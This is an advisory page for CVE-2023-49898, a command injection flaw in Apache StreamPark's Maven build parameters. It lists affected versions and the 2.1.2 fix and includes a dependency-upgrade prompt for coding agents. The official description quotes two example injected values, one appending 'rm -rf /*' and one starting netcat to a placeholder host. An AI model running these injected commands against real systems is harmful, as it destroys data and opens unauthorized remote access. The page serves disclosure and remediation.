# CVE-2023-49898: Apache StreamPark (incubating): Authenticated system users could trigger remote command execution

> Authenticated users can execute arbitrary commands via unvalidated Maven compilation parameters in Apache StreamPark.

- **Severity:** High 7.2 (`CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`)
- **Exploited in the wild:** Not known
- **Login needed:** An administrator
- **Attackable:** Over the internet
- **Victim action needed:** Not needed
- **Fix available:** Yes
- **Published:** 15 Dec 2023
- **Updated:** 2 Aug 2024
- **Also known as:** GHSA-qg44-xqwj-wc28

## What is CVE-2023-49898?

CVE-2023-49898 is a high-severity command injection vulnerability in Apache StreamPark (incubating), published on 15 Dec 2023. An attacker needs administrator access to exploit it, with no action from the victim.

### Official description

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.

Mitigation:

all users should upgrade to 2.1.2

Example:

##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Weakness: CWE-77 (Improper Neutralization of Special Elements used in a Command)

## Which versions are affected by CVE-2023-49898?

2 open source packages ship an affected version, including org.apache.streampark:streampark. It affects 1 product.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `org.apache.streampark:streampark` | Maven | From 2.0.0 | 2.1.2 |
| `org.apache.streampark:streampark` | Maven | From 2.0.0 | 2.1.2 |

Products: Apache Streampark.

## How do I fix CVE-2023-49898?

Upgrade org.apache.streampark:streampark to 2.1.2 or later.

## Is CVE-2023-49898 being exploited?

There is no known exploitation of CVE-2023-49898 in the wild and no public exploit code.

## Other vulnerabilities in Apache StreamPark (incubating)

- [CVE-2022-45802](https://insights.sbomify.com/CVE-2022-45802/): Apache StreamPark (incubating): Upload any file to any directory (critical 9.8)
- [CVE-2024-29070](https://insights.sbomify.com/CVE-2024-29070/): Apache StreamPark: session not invalidated after logout (critical 9.1)
- [CVE-2022-46365](https://insights.sbomify.com/CVE-2022-46365/): Apache StreamPark (incubating): Logic error causing any account reset (critical 9.1)
- [CVE-2024-29178](https://insights.sbomify.com/CVE-2024-29178/): Apache StreamPark: FreeMarker SSTI RCE Vulnerability (high 8.8)
- [CVE-2023-52291](https://insights.sbomify.com/CVE-2023-52291/): Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution (high 8.8)

## Fix prompt for AI coding agents

```text
Check this codebase for CVE-2023-49898 and fix it if it is affected.

What it is: CVE-2023-49898 is a high-severity command injection vulnerability in Apache StreamPark (incubating), published on 15 Dec 2023. An attacker needs administrator access to exploit it, with no action from the victim.
Exploitation: There is no known exploitation of CVE-2023-49898 in the wild and no public exploit code.

Affected packages and fixed versions:
- org.apache.streampark:streampark (Maven): affected from 2.0.0; fixed in 2.1.2
- org.apache.streampark:streampark (Maven): affected from 2.0.0; fixed in 2.1.2

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/CVE-2023-49898/ (Markdown: https://insights.sbomify.com/CVE-2023-49898/index.md)
```

## Sources

- CVE record: https://www.cve.org/CVERecord?id=CVE-2023-49898
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-49898
- OSV: https://osv.dev/vulnerability/CVE-2023-49898

---
From sbomify Insights: https://insights.sbomify.com/CVE-2023-49898/
Summaries are generated and may contain mistakes; the official description above is the record.
